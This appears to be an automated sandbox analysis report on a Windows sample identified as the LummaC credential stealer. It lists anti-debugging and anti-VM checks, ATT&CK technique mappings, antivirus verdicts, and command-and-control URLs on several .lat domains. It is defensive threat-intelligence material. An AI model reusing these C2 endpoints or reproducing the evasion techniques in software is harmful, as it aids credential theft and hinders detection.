Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 42884F second address: 42886D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480807Eh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jp 00007FCA74808076h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 42886D second address: 428890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FCA7480D351h 0x0000000f jng 00007FCA7480D346h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 428890 second address: 4288D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FCA7480809Bh 0x0000000b popad 0x0000000c push edi 0x0000000d jnc 00007FCA7480807Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 4288D4 second address: 4288D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 42A1A8 second address: 42A1AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 42A1AC second address: 42A1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 42A1B2 second address: 42A1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 42A1B8 second address: 42A1BD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 42A1BD second address: 42A1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 42A1C3 second address: 42A1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jg 00007FCA7480D348h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 42A041 second address: 42A052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 421DB4 second address: 421DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 438181 second address: 438187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 437E7C second address: 437ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D352h 0x00000009 jmp 00007FCA7480D34Ch 0x0000000e popad 0x0000000f jns 00007FCA7480D368h 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 44BE16 second address: 44BE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 44BE1B second address: 44BE30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA7480D350h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 44BFA0 second address: 44BFA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 44BFA6 second address: 44BFAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 324311 second address: 324317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 324317 second address: 32431B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 44CA57 second address: 44CA80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA74808086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA7480807Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 44CA80 second address: 44CAA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480D34Fh 0x00000007 jmp 00007FCA7480D353h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 4526DB second address: 4526DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 4526DF second address: 4526F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D351h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 45464F second address: 454681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 je 00007FCA748080A1h 0x0000000c jmp 00007FCA7480807Ah 0x00000011 pushad 0x00000012 jmp 00007FCA74808087h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 377DA7 second address: 377DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 377DAB second address: 377DBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480807Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 377DBD second address: 377DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Special instruction interceptor: First address: 1C89F4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Special instruction interceptor: First address: 36A891 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Special instruction interceptor: First address: 39456F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Special instruction interceptor: First address: 1C890A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Special instruction interceptor: First address: 3EFDE5 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Code function: 0_2_001CB0FF rdtsc

0_2_001CB0FF

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe TID: 7132	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe TID: 7120	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: Ebgl8jb6CW.exe, Ebgl8jb6CW.exe, 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Ebgl8jb6CW.exe, 00000000.00000002.1875766412.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875627830.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874426062.0000000000C64000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875766412.0000000000C68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: Ebgl8jb6CW.exe, 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	File opened: NTICE
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	File opened: SICE
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Code function: 0_2_001CB0FF rdtsc

0_2_001CB0FF

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Code function: 0_2_001AE110 LdrInitializeThunk,

0_2_001AE110

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Ebgl8jb6CW.exe	String found in binary or memory: bashfulacid.lat
Source: Ebgl8jb6CW.exe	String found in binary or memory: tentabatte.lat
Source: Ebgl8jb6CW.exe	String found in binary or memory: curverpluch.lat
Source: Ebgl8jb6CW.exe	String found in binary or memory: talkynicer.lat
Source: Ebgl8jb6CW.exe	String found in binary or memory: shapestickyr.lat
Source: Ebgl8jb6CW.exe	String found in binary or memory: manyrestro.lat
Source: Ebgl8jb6CW.exe	String found in binary or memory: slipperyloo.lat
Source: Ebgl8jb6CW.exe	String found in binary or memory: wordyfindy.lat
Source: Ebgl8jb6CW.exe	String found in binary or memory: observerfry.lat

Source: Ebgl8jb6CW.exe, Ebgl8jb6CW.exe, 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: [Program Manager

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	24 Virtualization/Sandbox Evasion	OS Credential Dumping	641 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	5 Obfuscated Files or Information	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ebgl8jb6CW.exe	53%	ReversingLabs	Win32.Trojan.Symmi
Ebgl8jb6CW.exe	51%	Virustotal		Browse
Ebgl8jb6CW.exe	100%	Avira	TR/Crypt.XPACK.Gen
Ebgl8jb6CW.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://manyrestro.lat:443/api	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/vo(A	100%	Avira URL Cloud	malware
https://talkynicer.lat:443/apii	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/vo	100%	Avira URL Cloud	malware
https://tentabatte.lat:443/api&	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
lev-tolstoi.com	172.67.157.254	true	false	high
wordyfindy.lat	unknown	unknown	false	high
slipperyloo.lat	unknown	unknown	true	unknown
curverpluch.lat	unknown	unknown	true	unknown
tentabatte.lat	unknown	unknown	true	unknown
manyrestro.lat	unknown	unknown	true	unknown
bashfulacid.lat	unknown	unknown	true	unknown
shapestickyr.lat	unknown	unknown	true	unknown
observerfry.lat	unknown	unknown	false	high
talkynicer.lat	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
slipperyloo.lat	false	high
observerfry.lat	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
https://lev-tolstoi.com/api	false	high
curverpluch.lat	false	high
tentabatte.lat	false	high
manyrestro.lat	false	high
bashfulacid.lat	false	high
wordyfindy.lat	false	high
shapestickyr.lat	false	high
talkynicer.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://player.vimeo.com	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://manyrestro.lat:443/api	Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875627830.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://observerfry.lat:443/api	Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
